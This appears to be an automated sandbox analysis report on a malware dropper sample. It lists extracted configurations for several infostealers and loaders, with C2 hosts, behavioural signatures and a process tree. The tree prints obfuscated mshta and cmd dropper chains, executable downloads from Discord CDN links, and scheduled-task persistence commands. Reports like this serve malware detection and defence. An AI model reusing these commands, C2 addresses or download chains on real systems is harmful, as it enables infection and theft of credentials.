Resubmissions

23-10-2021 15:52

211023-tbkbesdcfm 10

22-10-2021 17:40

211022-v8trsscggr 10

22-10-2021 15:55

211022-tc9ygacgan 10

22-10-2021 14:38

211022-rz1bfabgb8 10

Analysis

  • max time kernel
    619s
  • max time network
    2707s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    22-10-2021 15:55

General

  • Target

    Fri051e1e7444.exe

  • Size

    403KB

  • MD5

    b4c503088928eef0e973a269f66a0dd2

  • SHA1

    eb7f418b03aa9f21275de0393fcbf0d03b9719d5

  • SHA256

    2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2

  • SHA512

    c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

Malware Config

Extracted

Family

vidar

Version

41.5

Botnet

903

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    903

Extracted

Family

vidar

Version

41.5

Botnet

937

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    937

Extracted

Family

redline

C2

205.185.119.191:60857

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.5

Botnet

921

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    921

Extracted

Family

raccoon

Botnet

7c9b4504a63ed23664e38808e65948379b790395

Attributes
  • url4cnc

    http://telegka.top/capibar

    http://telegin.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.5

Botnet

933

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    933

Extracted

Family

icedid

Campaign

1875681804

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2

    suricata: ET MALWARE Win32/Kelihos.F exe Download 2

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 10 IoCs
  • Blocklisted process makes network request 54 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1372
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2852
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s BITS
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies data under HKEY_USERS
        PID:4016
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:6292
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2664
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2652
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2440
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2424
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1904
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1348
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1148
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1124
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1032
                        • C:\Users\Admin\AppData\Roaming\ujjjubj
                          C:\Users\Admin\AppData\Roaming\ujjjubj
                          2⤵
                            PID:6820
                            • C:\Users\Admin\AppData\Roaming\ujjjubj
                              C:\Users\Admin\AppData\Roaming\ujjjubj
                              3⤵
                                PID:7428
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:372
                            • C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe
                              "C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"
                              1⤵
                              • Checks computer location settings
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:1860
                              • C:\Users\Admin\Pictures\Adobe Films\Nj7cuk9vG8LKmjUHq1U4BRWD.exe
                                "C:\Users\Admin\Pictures\Adobe Films\Nj7cuk9vG8LKmjUHq1U4BRWD.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1168
                              • C:\Users\Admin\Pictures\Adobe Films\bhJTz3fhkSpWlXhHAP7Q4pAw.exe
                                "C:\Users\Admin\Pictures\Adobe Films\bhJTz3fhkSpWlXhHAP7Q4pAw.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3880
                                • C:\Users\Admin\Documents\RKsQ0YXR7fuY4dNElqP0UXp1.exe
                                  "C:\Users\Admin\Documents\RKsQ0YXR7fuY4dNElqP0UXp1.exe"
                                  3⤵
                                    PID:388
                                    • C:\Users\Admin\Pictures\Adobe Films\9084lcABbHLWhmDBz6H_O4bD.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\9084lcABbHLWhmDBz6H_O4bD.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5896
                                    • C:\Users\Admin\Pictures\Adobe Films\M6wMJLyZWM2y3UrRTPoN56Cp.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\M6wMJLyZWM2y3UrRTPoN56Cp.exe" /mixtwo
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4952
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 648
                                        5⤵
                                        • Program crash
                                        PID:6160
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 664
                                        5⤵
                                        • Program crash
                                        PID:6392
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 632
                                        5⤵
                                        • Program crash
                                        PID:6736
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 672
                                        5⤵
                                        • Program crash
                                        PID:6940
                                    • C:\Users\Admin\Pictures\Adobe Films\kGi2wjmPka_WecUo_7eiJjUK.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\kGi2wjmPka_WecUo_7eiJjUK.exe"
                                      4⤵
                                        PID:4084
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\kGi2wjmPka_WecUo_7eiJjUK.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\kGi2wjmPka_WecUo_7eiJjUK.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                          5⤵
                                            PID:6056
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\kGi2wjmPka_WecUo_7eiJjUK.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\kGi2wjmPka_WecUo_7eiJjUK.exe" ) do taskkill -f -iM "%~NxM"
                                              6⤵
                                                PID:6228
                                                • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                  7⤵
                                                    PID:6852
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                      8⤵
                                                        PID:6684
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                          9⤵
                                                            PID:2092
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                          8⤵
                                                            PID:7136
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                              9⤵
                                                              • Blocklisted process makes network request
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:716
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                10⤵
                                                                  PID:5460
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                  10⤵
                                                                    PID:6884
                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                    msiexec -Y ..\lXQ2g.WC
                                                                    10⤵
                                                                    • Loads dropped DLL
                                                                    PID:7828
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill -f -iM "kGi2wjmPka_WecUo_7eiJjUK.exe"
                                                              7⤵
                                                              • Kills process with taskkill
                                                              PID:7016
                                                      • C:\Users\Admin\Pictures\Adobe Films\Ow4SvNMozaXj9Xmy44SIvtZR.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\Ow4SvNMozaXj9Xmy44SIvtZR.exe"
                                                        4⤵
                                                          PID:5156
                                                        • C:\Users\Admin\Pictures\Adobe Films\XAT9bF4YnAgl6kZ5_paMsrOV.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\XAT9bF4YnAgl6kZ5_paMsrOV.exe"
                                                          4⤵
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:3032
                                                        • C:\Users\Admin\Pictures\Adobe Films\kTl8U4O7OtSbaEnrQVyc4WXN.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\kTl8U4O7OtSbaEnrQVyc4WXN.exe"
                                                          4⤵
                                                            PID:2324
                                                          • C:\Users\Admin\Pictures\Adobe Films\fqLthQzslsUDqzBijvcYrn0q.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\fqLthQzslsUDqzBijvcYrn0q.exe"
                                                            4⤵
                                                              PID:6432
                                                              • C:\Users\Admin\AppData\Local\Temp\is-B0EB6.tmp\fqLthQzslsUDqzBijvcYrn0q.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-B0EB6.tmp\fqLthQzslsUDqzBijvcYrn0q.tmp" /SL5="$401A0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\fqLthQzslsUDqzBijvcYrn0q.exe"
                                                                5⤵
                                                                • Loads dropped DLL
                                                                PID:6572
                                                                • C:\Users\Admin\AppData\Local\Temp\is-0JF8P.tmp\DYbALA.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-0JF8P.tmp\DYbALA.exe" /S /UID=2709
                                                                  6⤵
                                                                  • Drops file in Drivers directory
                                                                  • Adds Run key to start application
                                                                  PID:6172
                                                                  • C:\Program Files\Common Files\INKERAWGDX\foldershare.exe
                                                                    "C:\Program Files\Common Files\INKERAWGDX\foldershare.exe" /VERYSILENT
                                                                    7⤵
                                                                      PID:4344
                                                                    • C:\Users\Admin\AppData\Local\Temp\12-3dbe7-482-c8191-bdbf393330e33\Kaejykypubu.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\12-3dbe7-482-c8191-bdbf393330e33\Kaejykypubu.exe"
                                                                      7⤵
                                                                      • Checks computer location settings
                                                                      PID:4288
                                                                    • C:\Users\Admin\AppData\Local\Temp\31-80a19-30f-8feb1-8b56e8a220f49\Gaeqetymova.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\31-80a19-30f-8feb1-8b56e8a220f49\Gaeqetymova.exe"
                                                                      7⤵
                                                                        PID:5264
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uznlep0v.lbg\GcleanerEU.exe /eufive & exit
                                                                          8⤵
                                                                            PID:6528
                                                                            • C:\Users\Admin\AppData\Local\Temp\uznlep0v.lbg\GcleanerEU.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\uznlep0v.lbg\GcleanerEU.exe /eufive
                                                                              9⤵
                                                                                PID:8068
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yckteio2.fyc\installer.exe /qn CAMPAIGN="654" & exit
                                                                              8⤵
                                                                                PID:7232
                                                                                • C:\Users\Admin\AppData\Local\Temp\yckteio2.fyc\installer.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\yckteio2.fyc\installer.exe /qn CAMPAIGN="654"
                                                                                  9⤵
                                                                                    PID:8144
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxippkr4.rzz\any.exe & exit
                                                                                  8⤵
                                                                                    PID:7388
                                                                                    • C:\Users\Admin\AppData\Local\Temp\zxippkr4.rzz\any.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\zxippkr4.rzz\any.exe
                                                                                      9⤵
                                                                                        PID:8136
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4lpobyb5.5ip\gcleaner.exe /mixfive & exit
                                                                                      8⤵
                                                                                        PID:7596
                                                                                        • C:\Users\Admin\AppData\Local\Temp\4lpobyb5.5ip\gcleaner.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\4lpobyb5.5ip\gcleaner.exe /mixfive
                                                                                          9⤵
                                                                                            PID:7216
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hnjt0a3d.g1l\autosubplayer.exe /S & exit
                                                                                          8⤵
                                                                                            PID:7796
                                                                                            • C:\Users\Admin\AppData\Local\Temp\hnjt0a3d.g1l\autosubplayer.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\hnjt0a3d.g1l\autosubplayer.exe /S
                                                                                              9⤵
                                                                                              • Loads dropped DLL
                                                                                              • Drops file in Program Files directory
                                                                                              PID:1736
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst86A9.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:2256
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\dmk6bkoyxyGUjYuYcpaeym4S.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\dmk6bkoyxyGUjYuYcpaeym4S.exe"
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:6508
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4372
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4220
                                                                                • C:\Users\Admin\Pictures\Adobe Films\atSL6FSyYZp0iXlzyRH4QNnx.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\atSL6FSyYZp0iXlzyRH4QNnx.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1236
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\8C5F.bat "C:\Users\Admin\Pictures\Adobe Films\atSL6FSyYZp0iXlzyRH4QNnx.exe""
                                                                                    3⤵
                                                                                      PID:3204
                                                                                      • C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4252
                                                                                      • C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""
                                                                                        4⤵
                                                                                          PID:1784
                                                                                        • C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                                                                                          4⤵
                                                                                            PID:5276
                                                                                          • C:\Users\Admin\AppData\Local\Temp\32060\18.exe
                                                                                            18.exe
                                                                                            4⤵
                                                                                              PID:7036
                                                                                            • C:\Users\Admin\AppData\Local\Temp\32060\Transmissibility.exe
                                                                                              Transmissibility.exe
                                                                                              4⤵
                                                                                                PID:2192
                                                                                              • C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\8C5D.tmp\8C5E.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                                4⤵
                                                                                                  PID:6724
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Mz41TwrymuymuJyEwFbbtk8w.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Mz41TwrymuymuJyEwFbbtk8w.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3592
                                                                                              • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies system certificate store
                                                                                                PID:4468
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 2016
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Program crash
                                                                                                  PID:1784
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\BnTQacakJXRDVUs_KAmAz2hu.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\BnTQacakJXRDVUs_KAmAz2hu.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Identifies Wine through registry keys
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3588
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3WsBSzOLLz.bat"
                                                                                                3⤵
                                                                                                  PID:3912
                                                                                                  • C:\Windows\SysWOW64\w32tm.exe
                                                                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                    4⤵
                                                                                                      PID:7272
                                                                                                      • C:\Windows\System32\w32tm.exe
                                                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                        5⤵
                                                                                                          PID:448
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\BnTQacakJXRDVUs_KAmAz2hu.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\BnTQacakJXRDVUs_KAmAz2hu.exe"
                                                                                                        4⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Identifies Wine through registry keys
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:4164
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\_ioj2GVgETSvRamP_8vOmUbu.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\_ioj2GVgETSvRamP_8vOmUbu.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2944
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 1760
                                                                                                      3⤵
                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                      • Program crash
                                                                                                      PID:6916
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\LaqFwLQZKvrFFOkRiFaV7N4K.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\LaqFwLQZKvrFFOkRiFaV7N4K.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:716
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                      3⤵
                                                                                                        PID:5580
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /f /im chrome.exe
                                                                                                          4⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:6256
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\QHcS6xD8PJ6_qwlI0GTkkmYw.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\QHcS6xD8PJ6_qwlI0GTkkmYw.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1420
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\QHcS6xD8PJ6_qwlI0GTkkmYw.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\QHcS6xD8PJ6_qwlI0GTkkmYw.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:3232
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\4kDl23fKyHAhmkeRZYAkfGnA.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\4kDl23fKyHAhmkeRZYAkfGnA.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious use of AdjustPrivilegeToken
